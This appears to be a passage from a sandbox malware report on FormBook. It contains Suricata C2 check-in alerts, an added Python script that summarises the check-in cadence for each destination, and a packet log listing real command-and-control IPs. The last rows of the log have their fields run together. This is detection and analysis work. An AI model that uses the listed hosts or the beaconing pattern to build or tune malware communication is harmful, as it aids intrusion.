2025-01-10T09:12:14.211745+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49998        162.0.236.169   80         TCP
2025-01-10T09:12:16.804868+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49999        162.0.236.169   80         TCP
2025-01-10T09:12:19.334363+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  50000        162.0.236.169   80         TCP
2025-01-10T09:12:19.334363+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  50000        162.0.236.169   80         TCP
2025-01-10T09:12:25.801396+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50001        192.186.58.31   80         TCP
2025-01-10T09:12:28.347277+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50002        192.186.58.31   80         TCP
2025-01-10T09:12:30.919683+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50003        192.186.58.31   80         TCP
2025-01-10T09:12:33.532223+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  50004        192.186.58.31   80         TCP
2025-01-10T09:12:33.532223+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  50004        192.186.58.31   80         TCP
2025-01-10T09:12:40.589250+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50005        104.21.64.1     80         TCP
2025-01-10T09:12:43.099257+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50006        104.21.64.1     80         TCP
2025-01-10T09:12:45.679534+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50007        104.21.64.1     80         TCP
2025-01-10T09:12:48.218716+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  50008        104.21.64.1     80         TCP
2025-01-10T09:12:48.218716+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  50008        104.21.64.1     80         TCP
2025-01-10T09:13:10.285311+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50011        76.223.67.189   80         TCP
2025-01-10T09:13:12.831793+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50012        76.223.67.189   80         TCP
2025-01-10T09:13:15.396028+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50013        76.223.67.189   80         TCP
2025-01-10T09:13:18.082264+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  50014        76.223.67.189   80         TCP
2025-01-10T09:13:18.082264+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  50014        76.223.67.189   80         TCP
2025-01-10T09:13:24.945983+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50015        103.247.11.204  80         TCP
2025-01-10T09:13:27.495857+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50016        103.247.11.204  80         TCP
2025-01-10T09:13:30.418691+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50017        103.247.11.204  80         TCP
2025-01-10T09:13:32.878782+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  50018        103.247.11.204  80         TCP
2025-01-10T09:13:32.878782+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  50018        103.247.11.204  80         TCP
2025-01-10T09:13:38.849752+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50019        136.243.64.147  80         TCP
2025-01-10T09:13:41.488788+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50020        136.243.64.147  80         TCP
2025-01-10T09:13:44.064503+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50021        136.243.64.147  80         TCP
2025-01-10T09:13:46.617733+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  50022        136.243.64.147  80         TCP
2025-01-10T09:13:46.617733+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  50022        136.243.64.147  80         TCP
2025-01-10T09:14:01.430656+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50023        172.67.148.216  80         TCP
2025-01-10T09:14:04.048534+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50024        172.67.148.216  80         TCP
2025-01-10T09:14:06.587029+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  50025        172.67.148.216  80         TCP
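The alert table above shows the same cadence against every destination the sample rotates through: three POST check-ins on consecutive source ports, roughly 2.5 seconds apart, then one GET (on which both the ET and the ETPRO rule fire, so that flow appears twice). The following script is an added example, not part of the Joe Sandbox report, that makes this cadence explicit from IDS output: it de-duplicates alerts per flow, groups them by destination and derives the method sequence and mean inter-request gap. The input rows are copied from the table for three of the destinations; the tab-separated layout they are written in is an assumption chosen for the example, not a Suricata export format.

```python
"""Added example (not from the Joe Sandbox report): summarise FormBook
check-in alerts per C2 destination to expose the POST,POST,POST,GET cadence."""
import re
from collections import OrderedDict
from datetime import datetime

# Alert rows copied from the report's Suricata table and re-keyed by hand as
# TSV: timestamp, SID, signature, src IP, src port, dst IP, dst port.
# The TSV layout is an assumption for this example, not a Suricata format.
ALERTS_TSV = """\
2025-01-10T09:10:56.986600+0100\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t192.168.2.6\t49982\t172.65.235.97\t80
2025-01-10T09:10:56.986600+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t192.168.2.6\t49982\t172.65.235.97\t80
2025-01-10T09:11:12.568089+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.168.2.6\t49983\t192.64.119.109\t80
2025-01-10T09:11:15.182909+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.168.2.6\t49985\t192.64.119.109\t80
2025-01-10T09:11:17.715087+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.168.2.6\t49986\t192.64.119.109\t80
2025-01-10T09:11:20.332386+0100\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t192.168.2.6\t49987\t192.64.119.109\t80
2025-01-10T09:11:20.332386+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t192.168.2.6\t49987\t192.64.119.109\t80
2025-01-10T09:11:26.645856+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.168.2.6\t49988\t188.114.96.3\t80
2025-01-10T09:11:29.180718+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.168.2.6\t49989\t188.114.96.3\t80
2025-01-10T09:11:31.729322+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.168.2.6\t49990\t188.114.96.3\t80
2025-01-10T09:11:34.316833+0100\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t192.168.2.6\t49991\t188.114.96.3\t80
2025-01-10T09:11:34.316833+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t192.168.2.6\t49991\t188.114.96.3\t80
"""

# The HTTP method is only carried in the signature name, e.g. "(POST) M3".
METHOD_RE = re.compile(r"\((GET|POST)\)")


def parse_alerts(tsv):
    """Parse the TSV rows into dicts with a timezone-aware timestamp."""
    alerts = []
    for line in tsv.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, src_ip, src_port, dst_ip, dst_port = line.split("\t")
        m = METHOD_RE.search(sig)
        alerts.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid),
            "method": m.group(1) if m else None,
            "src_ip": src_ip, "src_port": int(src_port),
            "dst_ip": dst_ip, "dst_port": int(dst_port),
        })
    return alerts


def flows_by_destination(alerts):
    """Collapse duplicate alerts on one flow (ET and ETPRO both fire on the
    GET) and return, per destination IP in first-seen order, the ordered
    list of (method, src_port, timestamp) check-ins."""
    seen = set()
    per_dst = OrderedDict()
    for a in sorted(alerts, key=lambda a: (a["ts"], a["src_port"])):
        flow = (a["src_ip"], a["src_port"], a["dst_ip"], a["dst_port"])
        if flow in seen:
            continue
        seen.add(flow)
        per_dst.setdefault(a["dst_ip"], []).append((a["method"], a["src_port"], a["ts"]))
    return per_dst


def checkin_summary(per_dst):
    """Per destination: the method sequence and the mean gap (seconds)
    between successive check-ins, or None when there is a single flow."""
    summary = {}
    for dst, flows in per_dst.items():
        methods = [m for m, _, _ in flows]
        gaps = [(b[2] - a[2]).total_seconds() for a, b in zip(flows, flows[1:])]
        summary[dst] = {
            "methods": methods,
            "mean_gap_s": round(sum(gaps) / len(gaps), 2) if gaps else None,
        }
    return summary


if __name__ == "__main__":
    per_dst = flows_by_destination(parse_alerts(ALERTS_TSV))
    for dst, info in checkin_summary(per_dst).items():
        print(f"{dst:15} {' '.join(info['methods']):20} gap={info['mean_gap_s']}")
```

Run against the full alert table, the same grouping shows the sample walking its list of candidate C2 hosts one after another; the flow-level de-duplication matters because counting raw alerts would otherwise inflate every GET to two events.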
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 10, 2025 09:10:56.158442974 CET  49982        80         192.168.2.6      172.65.235.97
Jan 10, 2025 09:10:56.163436890 CET  80           49982      172.65.235.97    192.168.2.6
Jan 10, 2025 09:10:56.163661957 CET  49982        80         192.168.2.6      172.65.235.97
Jan 10, 2025 09:10:56.173058033 CET  49982        80         192.168.2.6      172.65.235.97
Jan 10, 2025 09:10:56.177913904 CET  80           49982      172.65.235.97    192.168.2.6
Jan 10, 2025 09:10:56.984431028 CET  80           49982      172.65.235.97    192.168.2.6
Jan 10, 2025 09:10:56.986498117 CET  80           49982      172.65.235.97    192.168.2.6
Jan 10, 2025 09:10:56.986599922 CET  49982        80         192.168.2.6      172.65.235.97
Jan 10, 2025 09:10:56.994817972 CET  49982        80         192.168.2.6      172.65.235.97
Jan 10, 2025 09:10:56.999630928 CET  80           49982      172.65.235.97    192.168.2.6
Jan 10, 2025 09:11:12.084891081 CET  49983        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:12.089812040 CET  80           49983      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:12.089903116 CET  49983        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:12.101990938 CET  49983        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:12.106755018 CET  80           49983      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:12.567893982 CET  80           49983      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:12.568039894 CET  80           49983      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:12.568089008 CET  49983        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:13.654575109 CET  49983        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:14.682054043 CET  49985        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:14.687081099 CET  80           49985      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:14.687416077 CET  49985        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:14.702112913 CET  49985        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:14.706942081 CET  80           49985      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:15.182732105 CET  80           49985      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:15.182816029 CET  80           49985      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:15.182909012 CET  49985        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:16.213134050 CET  49985        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:17.231631994 CET  49986        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:17.236430883 CET  80           49986      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:17.236519098 CET  49986        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:17.252322912 CET  49986        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:17.257991076 CET  80           49986      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:17.258301020 CET  80           49986      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:17.714900017 CET  80           49986      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:17.715018988 CET  80           49986      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:17.715086937 CET  49986        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:18.759495974 CET  49986        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:19.841415882 CET  49987        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:19.846226931 CET  80           49987      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:19.846347094 CET  49987        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:19.991816998 CET  49987        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:19.996669054 CET  80           49987      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:20.332204103 CET  80           49987      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:20.332329988 CET  80           49987      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:20.332386017 CET  49987        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:20.334806919 CET  49987        80         192.168.2.6      192.64.119.109
Jan 10, 2025 09:11:20.339632988 CET  80           49987      192.64.119.109   192.168.2.6
Jan 10, 2025 09:11:25.487834930 CET  49988        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:25.492594004 CET  80           49988      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:25.492660046 CET  49988        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:25.520510912 CET  49988        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:25.525291920 CET  80           49988      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:26.645780087 CET  80           49988      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:26.645797968 CET  80           49988      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:26.645855904 CET  49988        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:26.646106958 CET  80           49988      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:26.646157026 CET  49988        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:27.040808916 CET  49988        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:28.059533119 CET  49989        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:28.064513922 CET  80           49989      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:28.064676046 CET  49989        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:28.078591108 CET  49989        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:28.083441019 CET  80           49989      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:29.180578947 CET  80           49989      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:29.180603981 CET  80           49989      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:29.180619955 CET  80           49989      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:29.180717945 CET  49989        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:29.180768967 CET  49989        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:29.587753057 CET  49989        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:30.606906891 CET  49990        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:30.611903906 CET  80           49990      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:30.611994028 CET  49990        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:30.627504110 CET  49990        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:30.632766008 CET  80           49990      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:30.632778883 CET  80           49990      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:31.729211092 CET  80           49990      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:31.729276896 CET  80           49990      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:31.729321957 CET  49990        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:31.729387045 CET  80           49990      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:31.729429960 CET  49990        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:32.135055065 CET  49990        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:33.153728008 CET  49991        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:33.158654928 CET  80           49991      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:33.158739090 CET  49991        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:33.168490887 CET  49991        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:33.173329115 CET  80           49991      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:34.316623926 CET  80           49991      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:34.316644907 CET  80           49991      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:34.316833019 CET  49991        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:34.317051888 CET  80           49991      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:34.317114115 CET  49991        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:34.320724010 CET  49991        80         192.168.2.6      188.114.96.3
Jan 10, 2025 09:11:34.325581074 CET  80           49991      188.114.96.3     192.168.2.6
Jan 10, 2025 09:11:39.345541000 CET  49992        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:39.350440025 CET  80           49992      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:39.350528955 CET  49992        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:39.365300894 CET  49992        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:39.370132923 CET  80           49992      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:40.868994951 CET  49992        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:40.874006987 CET  80           49992      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:40.874062061 CET  49992        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:41.887641907 CET  49993        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:41.892810106 CET  80           49993      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:41.892965078 CET  49993        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:41.907010078 CET  49993        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:41.911909103 CET  80           49993      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:43.415793896 CET  49993        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:43.421056032 CET  80           49993      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:43.421118021 CET  49993        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:44.433984041 CET  49994        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:44.439089060 CET  80           49994      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:44.439243078 CET  49994        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:44.451373100 CET  49994        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:44.456367016 CET  80           49994      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:44.456464052 CET  80           49994      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:45.976305008 CET  49994        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:45.981631994 CET  80           49994      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:45.981718063 CET  49994        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:46.982043982 CET  49995        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:46.987093925 CET  80           49995      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:46.987206936 CET  49995        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:46.996006966 CET  49995        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:47.000866890 CET  80           49995      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:48.624751091 CET  80           49995      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:48.624793053 CET  80           49995      47.83.1.90       192.168.2.6
Jan 10, 2025 09:11:48.625013113 CET  49995        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:48.631419897 CET  49995        80         192.168.2.6      47.83.1.90
Jan 10, 2025 09:11:48.638113976 CET  80           49995      47.83.1.90       192.168.2.6
Jan 10, 2025 09:12:10.530010939 CET  49997        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:10.535003901 CET  80           49997      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:10.540633917 CET  49997        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:10.583653927 CET  49997        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:10.588515997 CET  80           49997      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:11.142097950 CET  80           49997      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:11.142119884 CET  80           49997      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:11.142216921 CET  49997        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:12.087677956 CET  49997        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:13.609432936 CET  49998        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:13.614619970 CET  80           49998      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:13.614707947 CET  49998        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:13.634260893 CET  49998        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:13.639194012 CET  80           49998      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:14.211534023 CET  80           49998      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:14.211597919 CET  80           49998      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:14.211745024 CET  49998        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:15.150866985 CET  49998        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:16.171201944 CET  49999        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:16.183053017 CET  80           49999      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:16.187207937 CET  49999        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:16.227170944 CET  49999        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:16.232023954 CET  80           49999      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:16.232314110 CET  80           49999      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:16.804718018 CET  80           49999      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:16.804816961 CET  80           49999      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:16.804867983 CET  49999        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:17.728481054 CET  49999        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:18.747586966 CET  50000        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:18.752530098 CET  80           50000      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:18.752624035 CET  50000        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:18.766303062 CET  50000        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:18.771250963 CET  80           50000      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:19.334186077 CET  80           50000      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:19.334249020 CET  80           50000      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:19.334362984 CET  50000        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:19.484668016 CET  50000        80         192.168.2.6      162.0.236.169
Jan 10, 2025 09:12:19.489708900 CET  80           50000      162.0.236.169    192.168.2.6
Jan 10, 2025 09:12:24.852394104 CET  50001        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:24.857305050 CET  80           50001      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:24.857382059 CET  50001        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:24.897656918 CET  50001        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:24.902549982 CET  80           50001      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:25.801300049 CET  80           50001      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:25.801351070 CET  80           50001      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:25.801395893 CET  50001        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:26.400248051 CET  50001        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:27.418798923 CET  50002        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:27.423803091 CET  80           50002      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:27.423898935 CET  50002        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:27.439080954 CET  50002        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:27.444186926 CET  80           50002      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:28.345824957 CET  80           50002      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:28.345875978 CET  80           50002      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:28.347276926 CET  50002        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:28.947254896 CET  50002        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:29.967364073 CET  50003        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:29.972284079 CET  80           50003      192.186.58.31    192.168.2.6
Jan 10, 2025 09:12:29.975172043 CET  50003        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:29.985951900 CET  50003        80         192.168.2.6      192.186.58.31
Jan 10, 2025 09:12:29.990895987 CET  80           50003      192.186.58.31    192.168.2.6
                                                                    Jan 10, 2025 09:12:29.990951061 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:30.919533014 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:30.919624090 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:30.919682980 CET5000380192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:31.494303942 CET5000380192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.512197971 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.517404079 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:32.519285917 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.527190924 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.532264948 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.531900883 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.531958103 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.531994104 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532027006 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532062054 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532095909 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532130003 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532161951 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532196999 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532222986 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.532232046 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532285929 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.532305002 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.537167072 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.537228107 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.537259102 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.537282944 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.587666035 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.736578941 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.736624956 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.736664057 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.736699104 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.736697912 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.736783981 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.741456032 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741493940 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741528034 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741539955 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.741561890 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741595984 CET8050004192.186.58.31192.168.2.6
